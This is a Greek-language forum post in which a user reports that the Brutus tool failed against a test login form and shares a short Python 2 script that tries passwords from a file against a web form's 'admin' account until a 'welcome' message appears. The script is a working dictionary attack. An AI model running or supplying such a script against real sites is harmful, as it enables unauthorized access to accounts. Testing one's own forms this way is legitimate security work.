Dictionary attack

Γενική συζήτηση περί software. Ανακοινώσεις νέων εκδόσεων προγραμμάτων, reviews, συζητήσεις για διάφορα προγράμματα κ.α.
Απαγορεύεται η παράνομη ανταλλαγή προγραμμάτων και αρχείων.
Απάντηση
Memas
Δημοσιεύσεις: 87
Εγγραφή: Παρ Δεκ 31, 2010 4:13 pm
Επικοινωνία:

Dictionary attack

Δημοσίευση από Memas »

Μπορώ να πώ πως έψαξα αρκετά για να βρώ ένα πρόγραμμα το οποίο να πραγματοποιεί τέτοιες επιθέσεις, αλλά όταν βρήκα και συγκεκριμένα το Brutus όταν το δοκίμασα σε μία δική μου απλή φόρμα (συγκεκριμένα το χρησιμοποίησα για HTTP forms) ακόμα και με τον κωδικό σε ένα αρχείο με 3 όλους και όλους δεν μπορούσε να τον εντοπίσει ακριβώς. Δεν πιστεύω να έκανα λάθος στις ρυθμίσεις του , αλλά μήπως ξέρει κάποιος να με βοηθήσει ή να προτείνει κάποιο άλλο παρόμοιο πρόγραμμα. Το καλό ή κακό της όλης διαδικασίας είναι πως προσπάθησα να φτιάξω κάτι πολύ απλό που να πραγματοποιεί τέτοιες "επιθέσεις" αν και πολύ αργό (περίπου 4-5 επαληθεύσεις το δευτερόλεπτο που εξαρτάται από το μέγεθος της σελίδας , άρα και της σύνδεσής σας) και πολύ δεν ξέρω πως να το χαρακτηρίσω :P χαχαχαχ :lol: είναι αρκετά αξιόπιστο. Ο κώδικας είναι παρακάτω σε python ( ναι δεν ξέρω γιατί το έκανα σε python, ακόμα αναρωτιέμαι, βασικά και ο κώδικας ήταν Ctr-C, Ctr-V :P ) και όποιος μπορεί να προσφέρει (ίσως μπορεί να γίνει καλό :P) και θέλει εδώ είμαστε... ;)

Κώδικας: Επιλογή όλων

import urllib
import urllib2

def return_post(url,data):	#pragmatopoiei ta post requests kai epistrefei ton html code gia auto einai argo..
    req = urllib2.Request(url, data)  #isws yparxei kai poly kalyteros tropos
    response = urllib2.urlopen(req)
    the_page = response.read()
    return the_page


url = 'http://to-site-pou-einai-h-forma/index.php'  #to link pou brisketai h forma
success = 'welcome'     #ena kommati toy mhnymatos ypodoxhs etsi wste otan bre8ei o kwdikos kai emfanistei na stamathsoume
f = open('codes.txt', 'r')  #to arxeio me tous kwdikous mas
for code in f:
	#line =code
	if len(code)>1: #an einai ena tote einai mono o xarakthras telous :P
		code = code[:len(code)-1]     #koboume ton xarakthra telous
		print 'Dokimazw ton kwdiko "'+code+'" twra '
		data='user=admin&pass='+code +'&posted=1'  #ta post data ta allazetai opws 8elete
		page=return_post(url,data)
		if success in page:      #an yparxei mhnyma epityxias ston code tote brikame thn selida mas ;)
			print 'The pass is'			
			print code
			break	
f.close()
Απάντηση